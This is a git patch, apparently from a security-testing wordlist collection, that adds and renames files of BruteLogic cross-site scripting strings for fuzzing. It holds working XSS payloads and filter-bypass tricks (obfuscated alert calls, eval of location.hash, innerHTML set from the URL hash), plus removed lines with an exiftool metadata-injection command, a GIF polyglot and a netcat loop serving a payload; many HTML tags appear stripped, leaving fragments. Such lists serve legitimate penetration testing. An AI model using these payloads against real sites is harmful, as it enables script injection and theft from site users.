From b4f21b34f5aaf2c1e615f1673dc0b80bd17281e0 Mon Sep 17 00:00:00 2001 From: Daniel Miessler Date: Wed, 20 Jul 2016 10:02:28 -0700 Subject: [PATCH] Added BruteLogic's XSS strings. --- Fuzzing/BRUTELOGIC-XSS-BYPASS-STRINGS.txt | 17 ++++ ...ATSHEET.txt => BRUTELOGIC-XSS-STRINGS.txt} | 78 ++++++------------- 2 files changed, 42 insertions(+), 53 deletions(-) create mode 100644 Fuzzing/BRUTELOGIC-XSS-BYPASS-STRINGS.txt rename Fuzzing/{BRUTELOGIC_XSS_CHEATSHEET.txt => BRUTELOGIC-XSS-STRINGS.txt} (58%) diff --git a/Fuzzing/BRUTELOGIC-XSS-BYPASS-STRINGS.txt b/Fuzzing/BRUTELOGIC-XSS-BYPASS-STRINGS.txt new file mode 100644 index 00000000000..59dedcdfde3 --- /dev/null +++ b/Fuzzing/BRUTELOGIC-XSS-BYPASS-STRINGS.txt @@ -0,0 +1,17 @@ +alert`1` +alert(1) +alert(1) +alert(1) +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top['al\x65rt'](1) +top[8680439..toString(30)](1) +navigator.vibrate(500) +eval(URL.slice(-8))>#alert(1) +eval(location.hash.slice(1)>#alert(1) +innerHTML=location.hash># diff --git a/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt b/Fuzzing/BRUTELOGIC-XSS-STRINGS.txt similarity index 58% rename from Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt rename to Fuzzing/BRUTELOGIC-XSS-STRINGS.txt index b691ce97214..5ea07a00e5e 100644 --- a/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt +++ b/Fuzzing/BRUTELOGIC-XSS-STRINGS.txt @@ -6,20 +6,6 @@ '-alert(1)// \'-alert(1)// -http://DOMAIN/PAGE.php/"> - - - - -(alert)(1) -a=alert,a(1) -[1].find(alert) -top["al"+"ert"](1) -top[/al/.source+/ert/.source](1) -al\u0065rt(1) -top['al\145rt'](1) -top['al\x65rt'](1) -top[8680439..toString(30)](1) lose focus! click this! copy this! @@ -42,7 +28,7 @@ top[8680439..toString(30)](1) - - - - - - -
-
.gif -$ exiftool -Artist='">' FILENAME.jpeg GIF89a/**/=alert(document.domain)//; - -#alert(1) -#alert(1) -# -$ while:; do echo "alert(1)" | nc -lp80; done - + +click this!#x +#x +



+









+









+





#x +press F12! +press F1! (MSIE) + + +